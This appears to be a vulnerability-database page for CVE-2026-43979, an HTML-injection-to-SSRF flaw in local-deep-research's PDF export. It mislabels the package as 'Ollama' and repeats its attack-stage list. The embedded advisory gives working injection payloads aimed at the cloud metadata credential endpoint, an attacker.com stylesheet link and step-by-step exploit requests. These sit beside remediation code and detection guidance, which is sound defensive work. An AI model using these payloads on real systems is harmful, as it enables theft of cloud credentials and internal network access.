CVE-2026-43979: Ollama HTML injection enables SSRF

CISO Take

local-deep-research, an AI-powered research platform with 1,454 downstream dependents and 24 prior CVEs in the package, contains an HTML injection flaw in its PDF export pipeline where user-controlled research queries are embedded unescaped into HTML rendered by WeasyPrint, which then issues outbound HTTP requests to attacker-specified URLs. Any authenticated user — no elevated privileges required — can chain this injection into a reliable SSRF that bypasses the application's own ssrf_validator.py, because WeasyPrint's resource-fetching path was never routed through that validator. On any cloud-hosted deployment (AWS, GCP, Azure), a single exploit call to 169.254.169.254 returns IAM role credentials, enabling lateral movement across the cloud environment with whatever privilege level the instance role holds. Upgrade to local-deep-research v1.6.0 immediately, which ships both the html.escape() input fix (PR #3082) and a safe_url_fetcher that enforces SSRF validation on all WeasyPrint outbound requests (PR #3613); if upgrade is blocked, disable PDF export and enforce IMDSv2 on any cloud instance running this service.

Sources: GitHub Advisory NVD ATLAS

What is the risk?

CVSS 5.0 Moderate understates operational risk for cloud-hosted deployments. Authentication is required but represents a low bar on any shared, SaaS, or multi-user research platform. The SSRF bypass is deterministic — no timing dependency, no brute force — and the PoC in the advisory is fully operational against commit f3540fb3. The critical amplifier is cloud metadata exposure: a successful exploit on EC2, GCE, or Azure returns short-lived IAM credentials whose scope depends entirely on instance role configuration, which is frequently over-privileged in AI research environments. With 1,454 dependents and 24 prior CVEs, the package represents elevated aggregate attack surface. No public exploit code or scanner template exists at time of analysis, but the advisory's lightweight verification payload ('</title><title>INJECTED') confirms exploitability in under 30 seconds.

How does the attack unfold?

Initial Access

Authenticated user submits a research query containing an HTML injection payload (e.g., </title><img src='http://169.254.169.254/...'>) via POST /api/start_research; no elevated privileges required.

AML.T0049

Payload Persistence

The malicious query string is stored verbatim in the database, persisting the injection until any PDF export for that research session is triggered.

Defense Evasion

PDF export renders the stored query into HTML without escaping; WeasyPrint resolves injected resource URLs directly, completely bypassing ssrf_validator.py which only validates user-submitted URLs at input time.

AML.T0107

Credential Theft

WeasyPrint issues an HTTP GET to the cloud metadata endpoint (169.254.169.254), retrieving IAM role credentials (AccessKeyId, SecretAccessKey, Token) usable for lateral movement across cloud services.

AML.T0106

Initial Access

Authenticated user submits a research query containing an HTML injection payload (e.g., </title><img src='http://169.254.169.254/...'>) via POST /api/start_research; no elevated privileges required.

AML.T0049

Payload Persistence

The malicious query string is stored verbatim in the database, persisting the injection until any PDF export for that research session is triggered.

Defense Evasion

PDF export renders the stored query into HTML without escaping; WeasyPrint resolves injected resource URLs directly, completely bypassing ssrf_validator.py which only validates user-submitted URLs at input time.

AML.T0107

Credential Theft

WeasyPrint issues an HTTP GET to the cloud metadata endpoint (169.254.169.254), retrieving IAM role credentials (AccessKeyId, SecretAccessKey, Token) usable for lateral movement across cloud services.

AML.T0106

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
Ollama	pip	< 1.6.0	`1.6.0`
174.6K 1.6K dependents Pushed 5d ago 11% patched ~0d to patch Full package profile →

Do you use Ollama? You're affected.

How severe is it?

CVSS 3.1

5.0 / 10

EPSS

0.3%

chance of exploitation in 30 days

Higher than 18% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV Network

AC Low

PR Low

UI None

S Changed

C Low

I None

A None

What should I do?

6 steps

Upgrade to local-deep-research v1.6.0 — this is the only complete fix; both PRs (#3082 html.escape, #3613 safe_url_fetcher) are required for full remediation.
If upgrade is blocked, disable PDF export at the application or reverse-proxy layer until patched.
On AWS, enforce IMDSv2 (hop limit 1, require PUT token) on instances running local-deep-research — WeasyPrint's default URL fetcher cannot satisfy the token challenge, blocking metadata access even if SSRF fires. Apply equivalent protections on GCP (metadata-flavor header) and Azure (require header).
Audit and tighten IAM instance roles assigned to research servers — apply least-privilege, review permissions weekly.
Search application and WAF logs for outbound HTTP requests from the web server process to 169.254.169.254, 10.0.0.0/8, 172.16.0.0/12, or 192.168.0.0/16.
Validate exposure before patching with the benign payload: submit a research query containing '</title><title>INJECTED' and export to PDF; if the document title reads 'INJECTED', the instance is unpatched.

What does CISA's SSVC say?

Decision Track*

Exploitation poc

Automatable No

Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Data Extraction DoS Framework API AML.T0049 - Exploit Public-Facing Application AML.T0075 - Cloud Service Discovery AML.T0106 - Exploitation for Credential Access AML.T0107 - Exploitation for Defense Evasion

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.9.3 - Protection of AI system

NIST AI RMF

MANAGE 2.2 - Treatments, responses, and prioritization approaches for identified risks are developed and shared

OWASP LLM Top 10

LLM05 - Improper Output Handling

Frequently Asked Questions

What is CVE-2026-43979?

local-deep-research, an AI-powered research platform with 1,454 downstream dependents and 24 prior CVEs in the package, contains an HTML injection flaw in its PDF export pipeline where user-controlled research queries are embedded unescaped into HTML rendered by WeasyPrint, which then issues outbound HTTP requests to attacker-specified URLs. Any authenticated user — no elevated privileges required — can chain this injection into a reliable SSRF that bypasses the application's own ssrf_validator.py, because WeasyPrint's resource-fetching path was never routed through that validator. On any cloud-hosted deployment (AWS, GCP, Azure), a single exploit call to 169.254.169.254 returns IAM role credentials, enabling lateral movement across the cloud environment with whatever privilege level the instance role holds. Upgrade to local-deep-research v1.6.0 immediately, which ships both the html.escape() input fix (PR #3082) and a safe_url_fetcher that enforces SSRF validation on all WeasyPrint outbound requests (PR #3613); if upgrade is blocked, disable PDF export and enforce IMDSv2 on any cloud instance running this service.

Is CVE-2026-43979 actively exploited?

No confirmed active exploitation of CVE-2026-43979 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-43979?

1. Upgrade to local-deep-research v1.6.0 — this is the only complete fix; both PRs (#3082 html.escape, #3613 safe_url_fetcher) are required for full remediation. 2. If upgrade is blocked, disable PDF export at the application or reverse-proxy layer until patched. 3. On AWS, enforce IMDSv2 (hop limit 1, require PUT token) on instances running local-deep-research — WeasyPrint's default URL fetcher cannot satisfy the token challenge, blocking metadata access even if SSRF fires. Apply equivalent protections on GCP (metadata-flavor header) and Azure (require header). 4. Audit and tighten IAM instance roles assigned to research servers — apply least-privilege, review permissions weekly. 5. Search application and WAF logs for outbound HTTP requests from the web server process to 169.254.169.254, 10.0.0.0/8, 172.16.0.0/12, or 192.168.0.0/16. 6. Validate exposure before patching with the benign payload: submit a research query containing '</title><title>INJECTED' and export to PDF; if the document title reads 'INJECTED', the instance is unpatched.

What systems are affected by CVE-2026-43979?

This vulnerability affects the following AI/ML architecture patterns: LLM research platforms, self-hosted AI tools, document generation pipelines, cloud-hosted AI applications.

What is the CVSS score for CVE-2026-43979?

CVE-2026-43979 has a CVSS v3.1 base score of 5.0 (MEDIUM). The EPSS exploitation probability is 0.26%.

What is the AI security impact?

Affected AI Architectures

LLM research platformsself-hosted AI toolsdocument generation pipelinescloud-hosted AI applications

MITRE ATLAS Techniques

AML.T0049 Exploit Public-Facing Application

AML.T0075 Cloud Service Discovery

AML.T0106 Exploitation for Credential Access

AML.T0107 Exploitation for Defense Evasion

Compliance Controls Affected

EU AI Act: Article 15

ISO 42001: A.9.3

NIST AI RMF: MANAGE 2.2

OWASP LLM Top 10: LLM05

What are the technical details?

Original Advisory

## Summary `PDFService._markdown_to_html()` constructs an HTML document by interpolating user-controlled values — specifically `title` (sourced from `research.title` or `research.query`) and `metadata` key-value pairs — directly into an f-string without any HTML escaping. An authenticated attacker can craft a research query containing HTML special characters to inject arbitrary HTML tags into the document processed by WeasyPrint during PDF export. This injection can be chained to trigger a Server-Side Request Forgery (SSRF), bypassing the application's existing SSRF defenses in `ssrf_validator.py`. --- ## Details **Vulnerable code:** `src/local_deep_research/web/services/pdf_service.py`, lines 171–176 ```python # pdf_service.py:171-176 if title: html_parts.append(f"<title>{title}</title>") # ← title is not escaped if metadata: for key, value in metadata.items(): html_parts.append(f'<meta name="{key}" content="{value}">') # ← key/value are not escaped ``` **Data flow trace:** ``` User input: research.query │ ▼ research_routes.py:1321 pdf_title = research.title or research.query │ ▼ research_routes.py:1325-1326 export_report_to_memory(report_content, format, title=pdf_title) │ ▼ pdf_service.py:107 PDFService.markdown_to_pdf(markdown_content, title=pdf_title) │ ▼ pdf_service.py:137 _markdown_to_html(markdown_content, title, metadata) │ ▼ pdf_service.py:172 f"<title>{title}</title>" ← injection point, no escaping │ ▼ pdf_service.py:112 HTML(string=html_content) ← WeasyPrint renders the injected HTML ``` `research.query` is a string submitted by the user via `POST /api/start_research`, stored as-is in the database, and retrieved without any sanitization. When the user triggers `POST /api/v1/research/<research_id>/export/pdf`, this value is embedded unescaped into the HTML document processed by WeasyPrint. **Injection point 1: `<title>` tag breakout** ``` Input: </title><img src="http://169.254.169.254/latest/meta-data/" /> Rendered: <title></title><img src="http://169.254.169.254/latest/meta-data/" /></title> ``` When WeasyPrint encounters the injected `<img>` tag, it issues an HTTP GET request to the value of `src` by default. **Injection point 2: `<meta>` attribute breakout** ``` Input: " /><link rel="stylesheet" href="http://attacker.com/evil.css Rendered: <meta name="..." content="" /><link rel="stylesheet" href="http://attacker.com/evil.css"> ``` WeasyPrint will fetch and apply the external stylesheet, which also constitutes SSRF. --- ## Proof of Concept **Step 1: Log in and submit a research query containing the injection payload** ```http POST /api/start_research HTTP/1.1 Host: localhost:5000 Content-Type: application/json Cookie: session=<valid_session> { "query": "</title><img src=\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\" onerror=\"x\"/>", "mode": "quick", "model_provider": "OLLAMA", "model": "llama3" } ``` The response returns a `research_id`, e.g. `"aaaa-bbbb-cccc-dddd"`. **Step 2: After the research completes, trigger PDF export** ```http POST /api/v1/research/aaaa-bbbb-cccc-dddd/export/pdf HTTP/1.1 Host: localhost:5000 Cookie: session=<valid_session> X-CSRFToken: <csrf_token> ``` **Step 3: Intermediate HTML constructed server-side** ```html <!DOCTYPE html><html><head> <meta charset="utf-8"> <title></title><img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" onerror="x"/></title> </head><body> ...report content... </body></html> ``` **Step 4: WeasyPrint issues an outbound HTTP request to the injected URL** Observed in network monitoring (e.g. `tcpdump`) or the target internal service logs: ``` GET /latest/meta-data/iam/security-credentials/ HTTP/1.1 Host: 169.254.169.254 User-Agent: WeasyPrint/... ``` **Lightweight verification (no SSRF environment required):** Set the query to: ``` </title><title>INJECTED ``` The resulting HTML will contain two `<title>` tags and the PDF document metadata title will read `INJECTED`, confirming successful injection. --- ## Impact ### 1. Chained SSRF (High Severity) By injecting `<img src>`, `<link href>`, or `<style>@import url()` tags pointing to internal addresses, WeasyPrint will issue HTTP requests on behalf of the server during PDF generation. This allows access to: - **Cloud metadata services** (`169.254.169.254`) on AWS, GCP, or Azure — enabling theft of IAM credentials and instance identity documents. - **Internal network services** (`192.168.x.x`, `10.x.x.x`) — enabling reconnaissance and interaction with internal APIs not exposed to the internet. - **Localhost administrative interfaces** — if SSRF protections are only applied at the user-input validation layer. This is an effective bypass of the application's existing SSRF defenses in `ssrf_validator.py`, because WeasyPrint's outbound resource requests are never routed through that validator. ### 2. HTML Document Structure Corruption Injected tags can prematurely close `<head>` and insert arbitrary content into `<body>`, causing WeasyPrint to render incorrectly or crash, resulting in a Denial of Service (DoS) condition for the export functionality. ### 3. CSS Injection (Medium Severity) By injecting `<link>` or `<style>` tags that load external stylesheets, an attacker can fully control the visual content of the generated PDF, enabling report content forgery or spoofing. ### 4. Affected Scope - All PDF export operations are affected. - The vulnerability is reachable by any authenticated user — no elevated privileges required. - Because each user operates against their own encrypted database, cross-user exploitation is not possible. However, on any shared or multi-tenant deployment, every authenticated user can independently trigger this vulnerability. --- ## Remediation Apply `html.escape()` to all user-controlled values before embedding them in the HTML template inside `_markdown_to_html`: ```python import html if title: html_parts.append(f"<title>{html.escape(title)}</title>") if metadata: for key, value in metadata.items(): html_parts.append( f'<meta name="{html.escape(str(key))}" content="{html.escape(str(value))}">' ) ``` Additionally, consider configuring WeasyPrint with a custom `url_fetcher` that blocks or restricts outbound HTTP requests to prevent SSRF via injected or legitimately-embedded external resources: ```python def safe_url_fetcher(url, timeout=10): from ssrf_validator import validate_url if not validate_url(url): raise ValueError(f"Blocked unsafe URL in PDF rendering: {url}") return weasyprint.default_url_fetcher(url, timeout=timeout) html_doc = HTML(string=html_content, url_fetcher=safe_url_fetcher) ``` --- *Report generated against commit `f3540fb3` — local-deep-research, branch `main`.* --- ## Maintainer note (2026-04-24) Thanks @Firebasky for the detailed report. The complete remediation spans two PRs, both merged to `main`: **#3082** (merged 2026-03-29, shipped in **v1.5.0+**) — closes the HTML-injection sinks: - `html.escape()` now wraps the `title` value in `<title>…</title>` - Same for metadata keys/values in `<meta name="…" content="…">` - Regression tests added in `tests/web/services/test_pdf_service.py` **#3613** (merged 2026-04-24, shipped in **v1.6.0**) — implements the `url_fetcher` recommendation from the Remediation section: - New `_safe_url_fetcher` in `pdf_service.py` delegates to `weasyprint.default_url_fetcher` only after `security.ssrf_validator.validate_url` accepts the URL - Blocks AWS metadata (169.254.169.254), RFC1918, loopback, and non-http(s) schemes - Covers the chained SSRF path through any URL reaching the rendered HTML — markdown body, citations, raw-HTML passthrough via Python-Markdown - Blocked URLs raise `UnsafePDFResourceURLError` (a `ValueError` subclass) so WeasyPrint skips the resource and the render continues - 8 regression tests, including an end-to-end render with `<img src="http://169.254.169.254/…">` embedded in the body **Advisory metadata:** CVSS `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N` (5.0 Moderate), CWEs **CWE-79** + **CWE-918**. **Patched in v1.6.0** — upgrade to v1.6.0 or later to receive both fixes.

Exploitation Scenario

An analyst with standard user access — or an external attacker who obtained a trial or shared account — submits a POST to /api/start_research with the query field set to: </title><img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" onerror="x"/>. The query is stored verbatim in the database. The attacker waits for research completion, then issues a POST to /api/v1/research/{id}/export/pdf. Server-side, local-deep-research constructs the HTML document with the unescaped payload inside the <title> tag; WeasyPrint parses the malformed HTML, resolves the injected <img> src attribute, and issues an outbound HTTP GET to 169.254.169.254. The metadata service returns the IAM role name and a JSON blob containing AccessKeyId, SecretAccessKey, and Token. The attacker captures these via an attacker-controlled callback host (substituted for 169.254.169.254 in external deployments) and immediately uses them to enumerate S3 buckets, access RDS snapshots, or pivot to other cloud services available to the instance role — potentially including training data, model checkpoints, or vector database contents.

Weaknesses (CWE)

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Primary CWE-918 Server-Side Request Forgery (SSRF) Primary

CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

[Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
[Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed. HTML body Element attributes (such as src="XYZ") URIs JavaScript sections Casca

Source: MITRE CWE corpus.